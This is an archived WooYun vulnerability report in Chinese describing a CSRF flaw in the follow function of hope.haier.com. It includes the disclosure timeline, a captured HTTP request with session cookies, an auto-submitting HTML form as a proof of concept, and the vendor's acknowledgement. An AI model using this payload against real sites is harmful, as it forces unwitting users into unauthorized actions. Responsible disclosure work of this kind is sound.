乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-04: 细节已通知厂商并且等待厂商处理中 2015-01-05: 厂商已经确认,细节仅向厂商公开 2015-01-15: 细节向核心白帽子及相关领域专家公开 2015-01-25: 细节向普通白帽子公开 2015-02-04: 细节向实习白帽子公开 2015-02-18: 细节向公众公开
一只沉睡的狮子
http://hope.haier.com/问题出现在关注上 没有任何限制 可导致CSRF问题的发生http://hope.haier.com/topic/other/topicBoddys
POST /topic/other/topicBoddys HTTP/1.1Host: hope.haier.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://hope.haier.com/group/group/detail/id/280.htmlContent-Length: 18Cookie: hope_lang=cn; PHPSESSID=t18mimkfk1nu2q1jp5bpm8auj2; Hm_lvt_1f3b513b6138cd211c24da6734bf74e9=1420119608; Hm_lpvt_1f3b513b6138cd211c24da6734bf74e9=1420120139; ZXKJSESSIONID=857c2ccb-adf8-0b9c-2df4-061a1dee8075***1; UniqueName=857c2ccb-adf8-0b9c-2df4-061a1dee8075; trsidsssosessionid=7119059F52694E98D4BE2296864BCB08-10.159.63.81; __utma=96306309.1406874401.1420119880.1420119880.1420119880.1; __utmb=96306309.5.10.1420119880; __utmc=96306309; __utmz=96306309.1420119880.1.1.utmcsr=hope.haier.com|utmccn=(referral)|utmcmd=referral|utmcct=/group/group/detail/id/280; __utmt=1; _acxm=d2a49033-763e-430f-867a-21ad08edf549; _gscu_1690714239=20119879h79bx040; _gscs_1690714239=201198792nmr4g40|pv:5; _gscbrs_1690714239=1; _gscu_345248242=20119879kqp7hu40; _gscs_345248242=20119879oi2izo40|pv:5; _gscbrs_345248242=1; SummerSummer321djs=120; idsALInfo=f20ea47283ea0da8bf54c69ae1ba2c3f13dbd828727f4349aa717db8735e32d581cce431a65c4aaee5879b7cf35d3928be92885d156d0503b7ae719d7a5b56e6b7e1c4ed248b497ba22184fd44ab3bb81b0527980a13a3edecb0aee7da97f163_1d1cb40960053ab00945ab793cceaacc; idsALUserSource=""; trsidssdssotoken=7119059F52694E98D4BE2296864BCB08-10.159.63.81_1420163180145; haieruser=SummerSummer321; haierbbsuser=SummerSummer321; bdshare_firstime=1420120043951Connection: keep-alivePragma: no-cacheCache-Control: no-cacheto_user_id=1600655
POC:
<html><body><form id="demo" name="demo" action="http://hope.haier.com/topic/other/topicBoddys" method="POST"><input type="text" name="to_user_id" value="1600655" /><input type="submit" value="submit" /></form><script> document.demo.submit();</script></body></html>
危害等级:中
漏洞Rank:6
确认时间:2015-01-05 17:41
感谢乌云平台Summer的测试与提醒,我方已安排人员进行处理。
暂无